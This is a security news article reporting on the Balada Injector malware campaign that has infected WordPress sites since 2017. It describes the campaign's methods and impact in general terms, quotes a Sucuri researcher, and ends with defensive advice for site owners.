Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy’s Sucuri, “leverages all known and recently discovered theme and plugin vulnerabilities” to breach WordPress sites. The attacks are known to play out in waves once every few weeks.
Diverse Infection Methods
“This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites,” security researcher Denis Sinegubko said. The websites include fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to ‘Please Allow to verify, that you are not a robot,’ thereby enabling the actors to send spam ads.
The report builds on recent findings from Doctor Web, which detailed a Linux malware family that exploits flaws in more than two dozen plugins and themes to compromise vulnerable WordPress sites. In the interim years, Balada Injector has relied on over 100 domains and a plethora of methods to take advantage of known security flaws (e.g., HTML injection and Site URL), with the attackers primarily attempting to obtain database credentials in the wp-config.php file.
The malware ultimately allows for the generation of fake WordPress admin users, harvest data stored in the underlying hosts, and leave backdoors for persistent access. Balada Injector further carries out broad searches from top-level directories associated with the compromised website’s file system to locate writable directories that belong to other sites.
“Most commonly, these sites belong to the webmaster of the compromised site and they all share the same server account and the same file permissions,” Sinegubko said. “In this manner, compromising just one site can potentially grant access to several other sites ‘for free.'”
To protect their websites, WordPress users are recommended to keep their website software up-to-date, remove unused plugins and themes, and use strong WordPress admin passwords.